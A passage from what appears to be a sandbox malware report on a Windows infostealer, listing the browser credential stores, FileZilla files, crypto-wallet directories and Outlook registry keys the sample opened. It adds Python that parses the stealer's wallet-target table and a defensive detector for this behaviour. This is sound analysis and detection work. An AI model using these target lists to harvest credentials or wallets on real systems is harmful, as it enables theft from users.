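# an ASSUMPTION: its only entries are .chia\mainnet\..., which lives under the
# user profile.
BASE_ENV = {1: "APPDATA", 2: "USERPROFILE"}

# Constructed environment matching the analysis VM's user name.
ENV = {
    "APPDATA": r"C:\Users\user\AppData\Roaming",
    "USERPROFILE": r"C:\Users\user",
}


@dataclass(frozen=True)
class WalletTarget:
    name: str        # label the stealer attaches to this target
    base: int        # base-directory code, see BASE_ENV
    path: str        # sub-path appended to the base directory
    mask: str        # file mask to collect
    recursive: bool  # whether subdirectories are walked

    @property
    def base_env(self) -> str:
        return BASE_ENV.get(self.base, f"UNKNOWN_{self.base}")


def parse_wallet_config(raw: str) -> list:
    """Split the table into 5-field records: name|base|path|mask|recursive."""
    fields = raw.rstrip("|").split("|")
    if len(fields) % 5:
        raise ValueError(f"truncated table: {len(fields)} fields, not a multiple of 5")
    return [
        WalletTarget(name=n, base=int(b), path=p, mask=m, recursive=(r == "1"))
        for n, b, p, m, r in zip(*[iter(fields)] * 5)
    ]


def raw_search_path(t: WalletTarget, env: dict) -> str:
    # base + "\" + path + "\" + mask: this naive join is what produces the
    # doubled backslashes seen in the dump (...Roaming\\MultiDoge\\multidoge.wallet).
    return f"{env[t.base_env]}\\{t.path}\\{t.mask}"


def normalized_path(t: WalletTarget, env: dict) -> str:
    """Collapse backslash runs, as the Win32 path layer does before the open."""
    return re.sub(r"\\{2,}", r"\\", raw_search_path(t, env))


def target_dirs(targets, env: dict) -> set:
    """Directories the stealer enumerates; compare with the 'File opened' lines."""
    return {re.sub(r"\\{2,}", r"\\", f"{env[t.base_env]}\\{t.path}") for t in targets}


WALLET_TARGETS = parse_wallet_config(RAW_CONFIG)

if __name__ == "__main__":
    for t in WALLET_TARGETS:
        print(f"{'R' if t.recursive else '-'} {t.name:<60} {normalized_path(t, ENV)}")
```

Running it lists every directory the sample opened in the `File opened` lines below except `Bitcoin\wallets\`, which belongs to the record lost to truncation. Note that the resolved Coinomi string in memory carries `*.*` although both Coinomi records specify `*.wallet` and `*.config`; that suggests the sample enumerates with `*.*` and filters on the mask afterwards, but the report does not show the filter itself.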
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-wal Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.js Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-shm Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-wal Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-shm Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File opened: C:\Users\user\AppData\Roaming\Exodus\ Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\ Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\ Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File opened: C:\Users\user\AppData\Roaming\Binance\ Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\ Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\ Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\ Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\ Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004 Jump to behavior
Source: Yara match File source: 00000000.00000002.2369187585.0000000000F01000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: fXg8zgxVTF.exe PID: 3796, type: MEMORYSTR
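Taken together, the behaviours logged in this report (Mozilla NSS libraries dropped to `C:\ProgramData` and the WinINet cache earlier on this page, browser credential stores and wallet directories opened by a process that is not a browser or wallet, and the Outlook profile key read from the registry) form a detection pattern that does not depend on the sample's hash. The Python below is an added example, not code from the report or from the sample: it applies those rules to constructed events in a vendor-neutral `pid / image / op / target` shape standing in for Sysmon or EDR telemetry, and flags a process only when it hits at least two distinct categories. The browser and mail-client allow-lists are assumptions; the benign Chrome, Firefox updater and Exodus events are constructed noise.

```python
"""Triage rules for the stealer behaviour recorded in this report.

Added example, not code from the report or the sample.  Event shape
(pid, image, op, target) is a constructed stand-in for Sysmon/EDR telemetry.
"""
import re
from collections import defaultdict

BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe"}   # ASSUMED allow-list
MAIL_CLIENTS = {"outlook.exe"}                            # ASSUMED allow-list

# nss3/softokn3/freebl3/mozglue are the Mozilla NSS libraries the sample drops
# into C:\ProgramData and the WinINet cache (cache copies are named name[1].dll)
# before reading Firefox data.  msvcp140/vcruntime140 are dropped too but are
# far too common to key on.
NSS_DLL = re.compile(r"^(nss3|softokn3|freebl3|mozglue)(\[\d+\])?\.dll$")

CHROMIUM_STORE = re.compile(
    r"\\user data\\[^\\]+\\(network\\cookies|login data|web data|history)(-journal)?$")
FIREFOX_STORE = re.compile(
    r"\\mozilla\\firefox\\profiles\\[^\\]+\\(places|cookies)\.sqlite(-wal|-shm)?$")

# Directory fragments taken from the "File opened" lines of the report.
WALLET_DIR_MARKERS = tuple(m.lower() for m in (
    "\\Bitcoin\\wallets\\", "\\Electrum\\wallets\\", "\\Electrum-LTC\\wallets\\",
    "\\ElectronCash\\wallets\\", "\\Exodus\\", "\\MultiDoge\\", "\\jaxx\\Local Storage\\",
    "\\com.liberty.jaxx\\IndexedDB\\", "\\atomic\\Local Storage\\leveldb\\", "\\Binance\\",
    "\\Coinomi\\Coinomi\\wallets\\", "\\Ledger Live\\", "\\atomic_qt\\", "\\Guarda\\",
))
OUTLOOK_PROFILE = ("\\windows messaging subsystem\\profiles\\outlook\\"
                   "9375cff0413111d3b88a00104b2a6676\\")


def classify(ev: dict):
    """Map one event to a stealer-behaviour category, or None."""
    image = ev["image"].rsplit("\\", 1)[-1].lower()
    target = ev["target"].lower()
    op = ev["op"]
    # NSS DLL written anywhere except a browser install directory.  Firefox's own
    # installer/updater writes these under Program Files, hence the location test.
    if op == "create" and NSS_DLL.match(target.rsplit("\\", 1)[-1]) \
            and "\\program files" not in target:
        return "nss_dll_drop"
    if op == "open" and (CHROMIUM_STORE.search(target) or FIREFOX_STORE.search(target)) \
            and image not in BROWSERS:
        return "browser_store"
    if op == "open":
        as_dir = target if target.endswith("\\") else target + "\\"
        if any(m in as_dir for m in WALLET_DIR_MARKERS):
            return "wallet_dir"   # wallet apps do this too; only scored in combination
    if op == "regopen" and OUTLOOK_PROFILE in target and image not in MAIL_CLIENTS:
        return "mail_profile"
    return None


def triage(events, threshold: int = 2) -> dict:
    """Return {pid: sorted categories} for processes with >= threshold categories."""
    hits = defaultdict(set)
    for ev in events:
        cat = classify(ev)
        if cat:
            hits[ev["pid"]].add(cat)
    return {pid: sorted(c) for pid, c in hits.items() if len(c) >= threshold}


# Constructed events: the first six mirror lines from this report for PID 3796,
# the rest are benign noise that the rules must not flag.
M = r"C:\Users\user\Desktop\fXg8zgxVTF.exe"
SAMPLE_EVENTS = [
    {"pid": 3796, "image": M, "op": "create", "target": r"C:\ProgramData\nss3.dll"},
    {"pid": 3796, "image": M, "op": "create",
     "target": r"C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\softokn3[1].dll"},
    {"pid": 3796, "image": M, "op": "open",
     "target": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"pid": 3796, "image": M, "op": "open",
     "target": r"C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-wal"},
    {"pid": 3796, "image": M, "op": "open",
     "target": "C:\\Users\\user\\AppData\\Roaming\\Exodus\\exodus.wallet\\"},
    {"pid": 3796, "image": M, "op": "regopen",
     "target": r"HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001"},
    {"pid": 4120, "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe", "op": "open",
     "target": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"pid": 5004, "image": r"C:\Program Files\Mozilla Firefox\updater.exe", "op": "create",
     "target": r"C:\Program Files\Mozilla Firefox\nss3.dll"},
    {"pid": 6010, "image": r"C:\Users\user\AppData\Local\exodus\Exodus.exe", "op": "open",
     "target": "C:\\Users\\user\\AppData\\Roaming\\Exodus\\exodus.wallet\\"},
]

if __name__ == "__main__":
    for pid, cats in triage(SAMPLE_EVENTS).items():
        print(f"PID {pid}: {', '.join(cats)}")
```

Only PID 3796 is reported; Chrome reading its own `Login Data`, the updater writing `nss3.dll` under Program Files, and a wallet application opening its own directory each stay below the threshold. The NSS DLLs are legitimate Mozilla components, so the location test matters more than the file name: a copy under `C:\ProgramData` or in the browser cache written by an unrelated executable is the signal, not the DLL itself.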

Remote Access Functionality

Source: Yara match File source: 00000000.00000002.2369765298.0000000002F2F000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2369187585.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: fXg8zgxVTF.exe PID: 3796, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: Process Memory Space: fXg8zgxVTF.exe PID: 3796, type: MEMORYSTR